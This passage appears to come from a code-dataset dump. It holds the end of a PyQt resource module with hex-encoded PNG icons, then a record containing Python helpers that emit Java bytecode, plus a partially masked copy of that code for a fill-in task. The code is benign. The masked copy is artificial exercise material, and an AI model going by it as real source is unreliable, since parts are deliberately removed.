79\\x69\\x63\\x6f\\x6e\\x2e\\x6e\\x65\\x74\\x2f\\x63\\x64\\x6e\\\n\\x2d\\x69\\x6d\\x67\\x2e\\x65\\x61\\x73\\x79\\x69\\x63\\x6f\\x6e\\x2e\\x63\\x6e\\\n\\x2f\\x66\\x69\\x6c\\x65\\x73\\x2f\\x31\\x32\\x35\\x2f\\x31\\x32\\x35\\x37\\x33\\\n\\x32\\x38\\x2e\\x70\\x6e\\x67\\xf9\\x67\\xb6\\x19\\x00\\x00\\x00\\x00\\x49\\x45\\\n\\x4e\\x44\\xae\\x42\\x60\\x82\\\n\\x00\\x00\\x07\\xd2\\\n\\x89\\\n\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0d\\x49\\x48\\x44\\x52\\x00\\\n\\x00\\x00\\x18\\x00\\x00\\x00\\x18\\x08\\x06\\x00\\x00\\x00\\xe0\\x77\\x3d\\xf8\\\n\\x00\\x00\\x00\\x04\\x67\\x41\\x4d\\x41\\x00\\x00\\xb1\\x8f\\x0b\\xfc\\x61\\x05\\\n\\x00\\x00\\x00\\x20\\x63\\x48\\x52\\x4d\\x00\\x00\\x7a\\x26\\x00\\x00\\x80\\x84\\\n\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00\\x75\\x30\\x00\\x00\\xea\\x60\\\n\\x00\\x00\\x3a\\x98\\x00\\x00\\x17\\x70\\x9c\\xba\\x51\\x3c\\x00\\x00\\x00\\x06\\\n\\x62\\x4b\\x47\\x44\\x00\\xff\\x00\\xff\\x00\\xff\\xa0\\xbd\\xa7\\x93\\x00\\x00\\\
n\\x00\\x09\\x70\\x48\\x59\\x73\\x00\\x00\\x0d\\xd7\\x00\\x00\\x0d\\xd7\\x01\\x42\\\n\\x28\\x9b\\x78\\x00\\x00\\x00\\x07\\x74\\x49\\x4d\\x45\\x07\\xe4\\x09\\x19\\x08\\\n\\x30\\x34\\x91\\xe1\\x1a\\xae\\x00\\x00\\x05\\x5d\\x49\\x44\\x41\\x54\\x48\\xc7\\\n\\xdd\\x95\\x4d\\x88\\x9d\\x57\\x19\\xc7\\x7f\\xef\\xf7\\x7d\\xe7\\xde\\xb9\\x33\\\n\\x99\\xef\\xc9\\x24\\x4d\\x1a\\xd3\\x4e\\x1d\\x9b\\x59\\x44\\x0c\\xba\\xb0\\x68\\\n\\xa0\\x76\\x15\\x37\\x8a\\xb8\\x30\\x45\\x44\\x10\\xf1\\x03\\x5c\\x99\\x4d\\x11\\\n\\x04\\x17\\x82\\x0b\\x91\\x5a\\xe8\\xca\\x8d\\x90\\xd2\\x9d\\x8a\\x22\\xb8\\xb2\\\n\\xa2\\x42\\x5b\\xd2\\x26\\xd1\\x26\\x69\\x12\\x93\\x4c\\xe6\\xde\\x99\\xb9\\x33\\\n\\x73\\xe7\\x7e\\xbf\\xf7\\x7d\\xcf\\x39\\xcf\\xe3\\xe2\\xde\\x49\\x8d\\x58\\x71\\\n\\xed\\x03\\x7f\\xce\\xe1\\x2c\\xce\\xef\\xf9\\x3f\\xcf\\x73\\x38\\x1e\\x1f\\x12\\\n\\x2f\\x7f\\xeb\\x02\\xf1\\xec\\x71\\x6c\\xb7\\x49\\x69\\x66\\x99\\x22\\x9c\\x60\\\n\\xd0\\xef\\x91\\xed\\xd7\\xf1\\x87\\x1d\\xde\\x7a\\xd0\\xe2\\xfc\\x33\\x0b\\x7c\\\n\\xfb\\x95\\xdf\\xf0\\xdf\\x22\\xf8\\x4f\\x87\\x3f\\xff\\xee\\x17\\x90\\xce\\x0e\\\n\\xd3\\xab\\x9f\\x64\\x3e\\x36\\x95\\x81\\x84\\x9f\\xe8\\x75\\xbb\\xe7\\x8b\\xac\\\n\\x77\\xd6\\x13\\x37\\x9d\\x52\\xb4\\xfb\\x1a\\x0f\\xe7\\x13\\xcb\\xf9\\xb3\\x4f\\\n\\xf3\\x87\\x2b\\x77\\x3e\\x14\\xe0\\xbd\\x72\\xf9\\x75\\xa6\\xaa\\x55\\x96\\x66\\\n\\x67\\xa9\\xa4\\x29\\xbe\\xef\\xd3\\xdb\\xba\\xcf\\x9d\\x95\\x17\\x28\\xfd\\xee\\\n\\xa5\\xcf\\xde\\xdf\\x6e\\x5e\\xda\\xdd\\x6f\\x7e\\x5c\\x55\\x13\\x0f\\x3c\\x67\\\n\\x8d\\xf1\\xd5\\xfd\\x2d\\x25\\xff\\xc9\\x8f\\xcf\\xd5\\x7f\\xfd\\xdb\\x13\\x3f\\\n\\xd0\\x78\\xf6\\x18\\x59\\x96\\xd1\\xed\\x76\\xd9\\xdf\\x6f\\xb2\\x59\\xab\\x71\\\n\\xfb\\xf6\\x1d\\xb6\\xb7\\xea\\x84\\x9e\\xe7\\x79\\x61\\x10\\x44\\x49\\x14\\xf9\\\n\\xe5\\x34\\xf5\\xe3\\x28\\xf2\\x67\\xd6\\xce\\xb2\\xf9\\xfa\\x0f\\x9f\\xbf\\x7e\\\n\\xb7\\xf6\\xf2\\x20\\xcf\\xcb\\x9f\\x3a\\xff\\xc2\\x70\\xe5\\xe4\\xe9\\xe0\\xc1\\\n\\x83\\x87\\xfe\\xb5\\x2b\\x6f\\xe9\\xee\\x83\\xdb\\x67\\x3b\\xd6\\
xfd\\xe2\\x7b\\\n\\x7f\\x5d\\xbe\\xf4\\x95\\xf3\\x6b\\xbf\\xea\\x0d\\x32\\xf2\\x3c\\x17\\x40\\x44\\\n\\x45\\x44\\x44\\x55\\xd5\\x01\\x7d\\xef\\xa7\\xbf\\x7c\\xed\\xa4\\xc0\\x8f\\x82\\\n\\x20\\x58\\x4c\\xe3\\x24\\xf4\\x7d\\x2f\\xf2\\x86\\xfd\\x70\\xf3\\xca\\x9f\\x4f\\\n\\x1d\\x74\\xbb\\x73\\x5f\\xfc\\xea\\x37\\xf3\\xd5\\xd5\\xd5\\xa4\\xdd\\xe9\\xf2\\\n\\xc6\\x9f\\xfe\\xc2\\xb5\\xbf\\xdf\\xa0\\xdb\\x69\\xd9\\x41\\xed\\x56\\xe8\\x99\\\n\\xac\\x37\\xf5\\xc4\\x47\\xeb\\x2d\\xe3\\xbb\\x7c\\x98\\x4b\\x5e\\xe4\\xae\\xc8\\\n\\x73\\xc9\\xf3\\x42\\xf2\\x3c\\xaf\\x5b\\x53\\x7c\\x27\\x0c\\xc3\\x60\\x32\\x2b\\\n\\xcc\\xf3\\x85\\xb1\\xf3\\x59\\x36\\xc4\\x39\\xc1\\x6f\\x6f\\x53\\xaf\\xd7\\xf8\\\n\\xf4\\xe7\\xbf\\xc4\\xfa\\xb3\\xcf\\x26\\x9e\\x07\\x6d\\x55\\xaa\\xd5\\x0a\\x73\\\n\\x33\\x47\\xf0\\x83\\x20\\xcc\\xba\\x4b\\xf4\\x36\\xde\\xab\\xec\\xdf\\xb8\\xfe\\\n\\x74\\x93\\x49\\x54\\x05\\x54\\x51\\x55\\x00\\x54\\x75\\x09\\x95\\x52\\x98\\x26\\\n\\x09\\xb9\\x71\\xd6\\x88\\xc5\\x59\\x87\\x88\\x45\\x5a\\x7b\\x04\\x49\\xca\\xd2\\\n\\xb1\\x13\\x74\\x7a\\x7d\\xac\\xb3\\x38\\x11\\xd2\\x52\\x89\\xea\\x64\\x85\\xbc\\\n\\x28\\x28\\x4d\\x4e\\xd3\\xf1\\x23\\xc8\\x33\\x82\\xb8\\x8c\\x11\\x1d\\x03\\xe4\\\n\\x10\\xe0\\x50\\x25\\x34\\x85\\x51\\x15\\xc1\\x5a\\x8b\\x38\\x41\\xac\\xc5\\x64\\\n\\x19\\x7e\\x10\\xb2\\x77\\xd0\\xe6\\xee\\xc6\\x43\\x92\\x28\\x22\\x0a\\x03\\xc4\\\n\\x39\\xc2\\x30\\xc0\\xf7\\x3d\\x02\\xdf\\xc7\\x29\\x38\\x6b\\x20\\x12\\x54\\x14\\\n\\x18\\x03\\x14\\x14\\x05\\x15\\xc2\\x41\\x96\\x21\\xa2\\xe3\\xec\\x05\\x67\\x1d\\\n\\x8a\\x47\\x31\\x1c\\xb0\\xf1\\x70\\x93\\x61\\x5e\\x50\\x99\\x48\\x99\\x48\\x12\\\n\\x0e\\x5a\\x6d\\xb2\\x6c\\x88\\x29\\x0a\\xac\\x29\\x28\\x86\\x7d\\xc0\\xc3\\x89\\\n\\xa0\\x87\\xe5\\x51\\x41\\x47\\x16\\x46\\x80\\x7e\\x96\\x11\\x04\\x11\\xce\\x5a\\\n\\x54\\x15\\xe3\\x04\\xa2\\x14\\xc9\\x07\\x34\\x36\\xee\\x12\\x97\\x26\\x28\\x8a\\\n\\x82\\x2c\\x8e\\x69\\xec\\xed\\xd1\\x6a\\xb5\\xc9\\x86\\x39\\xed\\xdd\\x3a\\xc3\\\n\\x5e\\x87\\x64\\x6a\\x0e\\x6b\\x05\\xe5\\x10\\x70\
\xd8\\x87\\xd1\\x3e\\xcc\\xb2\\\n\\x21\\x49\\x02\\xce\\x39\\x54\\x15\\x67\\x2d\\x52\\xaa\\x12\\xa5\\x65\\x1a\\xb7\\\n\\xae\\x82\\x1f\\x32\\xbb\\x72\\x82\\x34\\x49\\x68\\xec\\xee\\x8d\\x66\\x7d\\x7b\\\n\\x93\\xbd\\x7b\\x37\\x48\\xfc\\x90\\x5c\\x13\\xac\\x38\\xfc\\x51\\xdd\\xc7\\xa5\\\n\\xf9\\x17\\x40\\x51\\x18\\x3c\\x3f\\xc0\\x5a\\x87\\x8a\\xe0\\xac\\xc5\\x12\\x12\\\n\\x2e\\x9c\\x84\\xee\\x75\\xee\\xbf\\xfd\\x47\\x76\\xee\\x2d\\x92\\x56\\x67\\x69\\\n\\xee\\x36\\xe8\\x36\\x1b\\xf4\\x9b\\x3b\\x94\\xf1\\xf8\\xcc\\x62\\x99\\x5b\\x7d\\\n\\xc3\\xbd\\xb0\\x4a\\xd3\\xf4\\x1f\\xcb\\x5e\\x55\\xf1\\x50\\x42\\x63\\x0c\\x41\\\n\\x10\\x8c\\x32\\x17\\xc5\\x5a\\x87\\x73\\x0e\\x1b\\x4d\\x52\\x39\\x75\\x06\\x7d\\\n\\x78\\x9b\\xf6\\xd6\\x06\\x3b\\xff\\xb8\\x89\\x35\\x16\\x51\\x21\\x2a\\x4d\\x50\\\n\\x89\\x27\\xa8\\x86\\xc2\\x7a\\xf5\\x34\\x13\\xfd\\x9c\\x1b\\x31\\x34\\xb2\\xce\\\n\\xa3\\xcc\\x0f\\xfb\\x10\\x5a\\x6b\\xb1\\xc6\\x62\\x9d\\x43\\x9c\\xe0\\xdc\\x08\\\n\\x20\\xce\\x61\\xfd\\x94\\xe0\\xe8\\x33\\x1c\\x99\\x3d\\x8e\\x1b\\xf6\\x11\\x51\\\n\\x0e\\x0e\\x0e\\xd8\\xda\\xd9\\xe5\\xc0\\x78\\x4c\\xf5\\x16\\x58\\x4d\\x53\\x3e\\\n\\x32\\x59\\x46\\xdb\\x82\\xc4\\x8e\\xc6\\x70\\x0c\\x19\\x0d\\x2b\\xa1\\x73\\x0e\\\n\\xeb\\x1c\\xce\\x5a\\x9c\\x93\\xb1\\x93\\xf1\\x34\\xe9\\xc8\\x91\\x25\\x42\\xa2\\\n\\x2a\\x22\\xc2\\xc0\\xb5\\x31\\xd6\\x81\\x07\\xef\\x99\\x26\\xa1\\xe7\\xf3\\x84\\\n\\x5f\\xe6\\x58\\x5c\\x41\\x73\\x41\\x4b\\x4a\\x23\\x6b\\x8f\\x5d\\x28\\xa1\\xb3\\\n\\x0e\\x17\\xd8\\x0f\\xc6\\xd4\\x09\\x22\\x0e\\xeb\\xec\\xbf\\x39\\x92\\x31\\xd8\\\n\\xa2\\x2a\\x78\\x78\\xb4\\xf3\\x1e\\xef\\x8a\\x83\\x64\\x91\\xa3\\x12\\xb3\\xa0\\\n\\x09\\x4a\\x15\\x2d\\x09\\x8d\\xac\\xed\\x21\\x82\\x2f\\xce\\x79\\x6e\\x24\\x8c\\\n\\xb1\\x38\\x67\\xc7\\xcd\\x1e\\xbb\\xb2\\x6e\\x24\\x37\\x5a\\xc5\\xb9\\x0f\\x5e\\\n\\xac\\x42\\x3b\\xef\\xf3\\xce\\x70\\x8b\\xba\\x5f\\x20\\x4e\\x38\\x52\\xf8\\xac\\\n\\x6a\\x95\\xc9\\x30\\xd1\\xcc\\xe4\\x9e\\x6f\\x8a\\xc2\\x16\\x79\\xd1\\x36\\x85\\\n\\x79\\xfc\\x42\\xeb\\x46\\x0d\\xb7
\\xf6\\xd1\\xe5\\xce\\x8d\\x5c\\x1e\\x3e\\x2a\\\n\\x55\\xc1\\xf3\\xa0\\x3d\\xec\\xf1\\xce\\x70\\x8b\\x9d\\xd8\\xe1\\xfb\\xb0\\x5a\\\n\\xda\\xeb\\x2d\\x98\\x9d\\x57\\x37\\xb6\\x5b\\xb5\\x70\\x6f\\xab\\x76\\x57\\x94\\\n\\x17\\x81\\x73\\x61\\x14\\xaf\\x07\\x61\\xb4\\xe6\\x07\\xe1\\x49\\x55\\xe6\\x14\\\n\\x12\\x15\\x79\\x54\\xba\\xc3\\xbd\\xa2\\x78\\x80\\xaa\\xa0\\x82\\x35\\x45\\xde\\\n\\xa8\\x75\\xda\\x37\\x8b\\xb8\\x7b\\xed\\x73\\x4b\\xcb\\xd1\\xf2\\x74\\xfd\\xed\\\n\\xa7\\x1a\\xf7\\x2e\\xbf\\x76\\xf1\\xb9\\x3c\\x4c\\xcb\\xe5\\x62\\x7e\\xf9\\xd8\\\n\\x9b\\x5f\\xfb\\xfe\\x4b\\x6f\\x9e\\x9b\\xf2\\xc2\\x99\\xf9\\xc5\\xe9\\x85\\x95\\\n\\xe3\\x2b\\xe5\\xc9\\xa9\\xd5\\xb8\\x94\\x9e\\x89\\xe2\\xe4\\x4c\\x10\\x44\\x4f\\\n\\xf9\\x41\\xb0\\xec\\xfb\\x41\\x55\\x55\\x02\\x67\\x6d\\x6e\\x4d\\xb1\\x93\\xf5\\\n\\xfb\\xef\\x0f\\x07\\xfd\\x77\\x07\\xbd\\xee\\xd5\\x22\\xcf\\x6f\\xd5\\x61\\xf3\\\n\\xea\\xfb\\x57\\x9b\\xaa\\x97\\xf3\\x9b\\xcf\\x7d\\x9d\\x2f\\xff\\xec\\x0d\\xbc\\\n\\xc7\\xbe\\x37\\xcf\\x63\\x61\\xe5\\x38\\xa7\\xd7\\xd6\\xb9\\x70\\xf1\\x1b\\x5c\\\n\\xba\\x78\\xc1\\x07\\x2a\\x33\\xf3\\x4b\\x0b\\xd5\\x23\\xb3\\xa7\\xca\\xd5\\xa9\\\n\\xb5\\x3c\\xeb\\x2f\\xed\\xed\\xd4\\x6a\\xfd\\x76\\xe7\\xbe\\x31\\x45\\x03\\x68\\\n\\x01\\x9d\\xb1\\xb2\\xf5\\xa3\\x73\\xd2\\xec\\xb5\\xd8\\xec\\x58\\xfe\\xa7\\x08\\\n\\xa3\\x88\\x27\\x57\\x3f\\xc6\\xab\\xbf\\xbf\\x02\\xe0\\x03\\xd1\\x58\\xf1\\x58\\\n\\xe1\\xf8\\xfc\\xff\\x34\\xfe\\x09\\x50\\xc9\\xce\\x14\\x61\\x6a\\x10\\x46\\x00\\\n\\x00\\x00\\x25\\x74\\x45\\x58\\x74\\x64\\x61\\x74\\x65\\x3a\\x63\\x72\\x65\\x61\\\n\\x74\\x65\\x00\\x32\\x30\\x32\\x30\\x2d\\x30\\x37\\x2d\\x31\\x39\\x54\\x30\\x33\\\n\\x3a\\x33\\x39\\x3a\\x31\\x39\\x2b\\x30\\x30\\x3a\\x30\\x30\\x9d\\x70\\x4c\\x6c\\\n\\x00\\x00\\x00\\x25\\x74\\x45\\x58\\x74\\x64\\x61\\x74\\x65\\x3a\\x6d\\x6f\\x64\\\n\\x69\\x66\\x79\\x00\\x32\\x30\\x31\\x39\\x2d\\x30\\x31\\x2d\\x30\\x38\\x54\\x31\\\n\\x37\\x3a\\x35\\x34\\x3a\\x30\\x36\\x2b\\x30\\x30\\x3a\\x30\\x30\\xfa\\xae\\x64\\\n\\x88\\x00\\x00\\x0
0\\x20\\x74\\x45\\x58\\x74\\x73\\x6f\\x66\\x74\\x77\\x61\\x72\\\n\\x65\\x00\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x69\\x6d\\x61\\x67\\x65\\x6d\\\n\\x61\\x67\\x69\\x63\\x6b\\x2e\\x6f\\x72\\x67\\xbc\\xcf\\x1d\\x9d\\x00\\x00\\x00\\\n\\x18\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\x44\\x6f\\x63\\x75\\\n\\x6d\\x65\\x6e\\x74\\x3a\\x3a\\x50\\x61\\x67\\x65\\x73\\x00\\x31\\xa7\\xff\\xbb\\\n\\x2f\\x00\\x00\\x00\\x18\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\\n\\x49\\x6d\\x61\\x67\\x65\\x3a\\x3a\\x48\\x65\\x69\\x67\\x68\\x74\\x00\\x35\\x31\\\n\\x32\\x8f\\x8d\\x53\\x81\\x00\\x00\\x00\\x17\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\\n\\x6d\\x62\\x3a\\x3a\\x49\\x6d\\x61\\x67\\x65\\x3a\\x3a\\x57\\x69\\x64\\x74\\x68\\\n\\x00\\x35\\x31\\x32\\x1c\\x7c\\x03\\xdc\\x00\\x00\\x00\\x19\\x74\\x45\\x58\\x74\\\n\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\x4d\\x69\\x6d\\x65\\x74\\x79\\x70\\x65\\x00\\\n\\x69\\x6d\\x61\\x67\\x65\\x2f\\x70\\x6e\\x67\\x3f\\xb2\\x56\\x4e\\x00\\x00\\x00\\\n\\x17\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\x4d\\x54\\x69\\x6d\\\n\\x65\\x00\\x31\\x35\\x34\\x36\\x39\\x37\\x30\\x30\\x34\\x36\\xc4\\x38\\x95\\x8f\\\n\\x00\\x00\\x00\\x13\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\x53\\\n\\x69\\x7a\\x65\\x00\\x31\\x35\\x32\\x30\\x39\\x38\\x42\\xe5\\x15\\x0c\\xcb\\x00\\\n\\x00\\x00\\x5a\\x74\\x45\\x58\\x74\\x54\\x68\\x75\\x6d\\x62\\x3a\\x3a\\x55\\x52\\\n\\x49\\x00\\x66\\x69\\x6c\\x65\\x3a\\x2f\\x2f\\x2f\\x64\\x61\\x74\\x61\\x2f\\x77\\\n\\x77\\x77\\x72\\x6f\\x6f\\x74\\x2f\\x77\\x77\\x77\\x2e\\x65\\x61\\x73\\x79\\x69\\\n\\x63\\x6f\\x6e\\x2e\\x6e\\x65\\x74\\x2f\\x63\\x64\\x6e\\x2d\\x69\\x6d\\x67\\x2e\\\n\\x65\\x61\\x73\\x79\\x69\\x63\\x6f\\x6e\\x2e\\x63\\x6e\\x2f\\x66\\x69\\x6c\\x65\\\n\\x73\\x2f\\x31\\x30\\x36\\x2f\\x31\\x30\\x36\\x36\\x32\\x33\\x38\\x2e\\x70\\x6e\\\n\\x67\\x39\\x3a\\x2a\\x0d\\x00\\x00\\x00\\x00\\x49\\x45\\x4e\\x44\\xae\\x42\\x60\\\n\\x82\\\n\"\n\nqt_resource_name = 
b\"\\\n\\x00\\x03\\\n\\x00\\x00\\x77\\x47\\\n\\x00\\x70\\\n\\x00\\x6e\\x00\\x67\\\n\\x00\\x04\\\n\\x00\\x06\\xfa\\x5e\\\n\\x00\\x69\\\n\\x00\\x63\\x00\\x6f\\x00\\x6e\\\n\\x00\\x0b\\\n\\x05\\xff\\xda\\x07\\\n\\x00\\x31\\\n\\x00\\x31\\x00\\x33\\x00\\x37\\x00\\x32\\x00\\x36\\x00\\x34\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\\x00\\x0e\\\n\\x02\\xd3\\xb9\\x87\\\n\\x00\\x64\\\n\\x00\\x65\\x00\\x61\\x00\\x6c\\x00\\x20\\x00\\x73\\x00\\x6d\\x00\\x61\\x00\\x6c\\x00\\x6c\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\\x00\\x07\\\n\\x09\\xc7\\x57\\xa7\\\n\\x00\\x73\\\n\\x00\\x65\\x00\\x74\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\\x00\\x0b\\\n\\x0f\\x29\\x4e\\xc7\\\n\\x00\\x70\\\n\\x00\\x72\\x00\\x65\\x00\\x76\\x00\\x69\\x00\\x65\\x00\\x77\\x00\\x2e\\x00\\x70\\x00\\x6e\\x00\\x67\\\n\"\n\nqt_resource_struct_v1 = b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\\n\\x00\\x00\\x00\\x0c\\x00\\x02\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\\n\\x00\\x00\\x00\\x36\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\xe2\\\n\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x58\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x05\\x91\\\n\\x00\\x00\\x00\\x6c\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x0c\\xbc\\\n\"\n\nqt_resource_struct_v2 = 
b\"\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x0c\\x00\\x02\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x03\\\n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x00\\x36\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x01\\xe2\\\n\\x00\\x00\\x01\\x74\\x56\\xe3\\x3f\\xc3\\\n\\x00\\x00\\x00\\x1a\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\\n\\x00\\x00\\x01\\x68\\x2e\\xd5\\xff\\x38\\\n\\x00\\x00\\x00\\x58\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x05\\x91\\\n\\x00\\x00\\x01\\x74\\xc4\\x73\\x3a\\x8f\\\n\\x00\\x00\\x00\\x6c\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x0c\\xbc\\\n\\x00\\x00\\x01\\x74\\xc4\\x73\\xad\\x43\\\n\"\n\nqt_version = [int(v) for v in QtCore.qVersion().split('.')]\nif qt_version < [5, 8, 0]:\n rcc_version = 1\n qt_resource_struct = qt_resource_struct_v1\nelse:\n rcc_version = 2\n qt_resource_struct = qt_resource_struct_v2\n\ndef qInitResources():\n QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)\n\nqInitResources()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from ...java import opcodes as JavaOpcodes
from .primitives import ICONST_val
##########################################################################
# Common Java operations
##########################################################################
class New:
def __init__(self, classname):
self.classname = classname
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW(self.classname),
JavaOpcodes.DUP()
)
class Init:
def __init__(self, classname, *args):
self.classname = classname
self.args = args
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKESPECIAL(
self.classname,
'<init>',
args=self.args,
returns='V'
),
)
class Yield:
def __init__(self, yield_point):
self.yield_point = yield_point
def process(self, context):
context.add_opcodes(
ICONST_val(self.yield_point),
JavaOpcodes.INVOKEVIRTUAL(
'org/python/types/Generator',
'yield',
args=['Ljava/util/Map;', 'I'],
returns='V'
),
# "yield" by returning from the generator method.
JavaOpcodes.ARETURN()
)
##########################################################################
# Java types and their operations
##########################################################################
class Array:
def __init__(self, size, classname='org/python/Object', fill=None):
self.size = size
self.classname = classname
self.fill = fill
def process(self, context):
context.add_opcodes(
ICONST_val(self.size),
JavaOpcodes.ANEWARRAY(self.classname),
)
if self.fill:
for i in range(self.size):
context.add_opcodes(
JavaOpcodes.DUP(),
ICONST_val(i),
self.fill,
JavaOpcodes.AASTORE(),
)
class List:
def __init__(self, size=None):
self.size = size
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW('java/util/ArrayList'),
JavaOpcodes.DUP(),
)
if self.size:
context.add_opcodes(
ICONST_val(self.size),
Init('java/util/ArrayList', 'I')
)
else:
context.add_opcodes(
Init('java/util/ArrayList')
)
class add:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/List',
'add',
args=['Ljava/lang/Object;'],
returns='Z'
),
JavaOpcodes.POP(),
)
class Map:
def process(self, context):
context.add_opcodes(
JavaOpcodes.NEW('java/util/HashMap'),
JavaOpcodes.DUP(),
Init('java/util/HashMap')
)
class get:
def __init__(self, key):
self.key = key
def process(self, context):
context.add_opcodes(
JavaOpcodes.LDC_W(self.key),
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'get',
args=['Ljava/lang/Object;'],
returns='Ljava/lang/Object;'
)
)
class put:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'put',
args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],
returns='Ljava/lang/Object;'
),
JavaOpcodes.POP()
)
class putAll:
def process(self, context):
context.add_opcodes(
JavaOpcodes.INVOKEINTERFACE(
'java/util/Map',
'putAll',
args=['Ljava/util/Map;'],
returns='V'
),
)
class Class:
class forName:
def __init__(self, classname):
self.classname = classname
def process(self, context):
context.add_opcodes(
JavaOpcodes.LDC_W(self.classname),
JavaOpcodes.INVOKESTATIC(
'java/lang/Class',
'forName',
args=['Ljava/lang/String;'],
returns='Ljava/lang/Class;'
),
)
class THROW:
# Raise an exception of given type with given arguments
# Example:
# THROW(
# 'org/python/exceptions/AttributeError',
# ['Ljava/lang/String;', JavaOpcodes.LDC_W("Invalid attribute")],
# )
def __init__(self, exception_class, *exception_args):
self.exception_class = exception_class
self.exc_arg_types = [e[0] for e in exception_args]
self.exc_arg_values = [e[1] for e in exception_args]
def process(self, context):
context.add_opcodes(
New(self.exception_class),
*self.exc_arg_values
)
context.add_opcodes(
Init(self.exception_class, *self.exc_arg_types),
JavaOpcodes.ATHROW(),
)
|
normal
|
{
"blob_id": "67e0536dc9f38ab82fe30e715599fed93c5425a5",
"index": 5142,
"step-1": "<mask token>\n\n\nclass Array:\n\n def __init__(self, size, classname='org/python/Object', fill=None):\n self.size = size\n self.classname = classname\n self.fill = fill\n\n def process(self, context):\n context.add_opcodes(ICONST_val(self.size), JavaOpcodes.ANEWARRAY(\n self.classname))\n if self.fill:\n for i in range(self.size):\n context.add_opcodes(JavaOpcodes.DUP(), ICONST_val(i), self.\n fill, JavaOpcodes.AASTORE())\n\n\nclass List:\n\n def __init__(self, size=None):\n self.size = size\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/ArrayList'),\n JavaOpcodes.DUP())\n if self.size:\n context.add_opcodes(ICONST_val(self.size), Init(\n 'java/util/ArrayList', 'I'))\n else:\n context.add_opcodes(Init('java/util/ArrayList'))\n\n\n class add:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE(\n 'java/util/List', 'add', args=['Ljava/lang/Object;'],\n returns='Z'), JavaOpcodes.POP())\n\n\nclass Map:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.NEW('java/util/HashMap'),\n JavaOpcodes.DUP(), Init('java/util/HashMap'))\n\n\n class get:\n\n def __init__(self, key):\n self.key = key\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.key), JavaOpcodes.\n INVOKEINTERFACE('java/util/Map', 'get', args=[\n 'Ljava/lang/Object;'], returns='Ljava/lang/Object;'))\n\n\n class put:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'put', args=['Ljava/lang/Object;', 'Ljava/lang/Object;'],\n returns='Ljava/lang/Object;'), JavaOpcodes.POP())\n\n\n class putAll:\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.INVOKEINTERFACE('java/util/Map',\n 'putAll', args=['Ljava/util/Map;'], returns='V'))\n\n\nclass Class:\n\n\n class forName:\n\n def __init__(self, classname):\n self.classname = classname\n\n def process(self, context):\n context.add_opcodes(JavaOpcodes.LDC_W(self.classname),\n 
JavaOpcodes.INVOKESTATIC('java/lang/Class', 'forName', args\n =['Ljava/lang/String;'], returns='Ljava/lang/Class;'))\n\n\nclass THROW:\n\n def __init__(self, exception_class, *exception_args):\n self.exception_class = exception_class\n self.exc_arg_types = [e[0] for e in exception_args]\n self.exc_arg_values = [e[1] for e in exception_args]\n\n def process(self, context):\n context.add_opcodes(New(self.exception_class), *self.exc_arg_values)\n context.add_opcodes(Init(self.exception_class, *self.exc_arg_types),\n JavaOpcodes.ATHROW())\n",
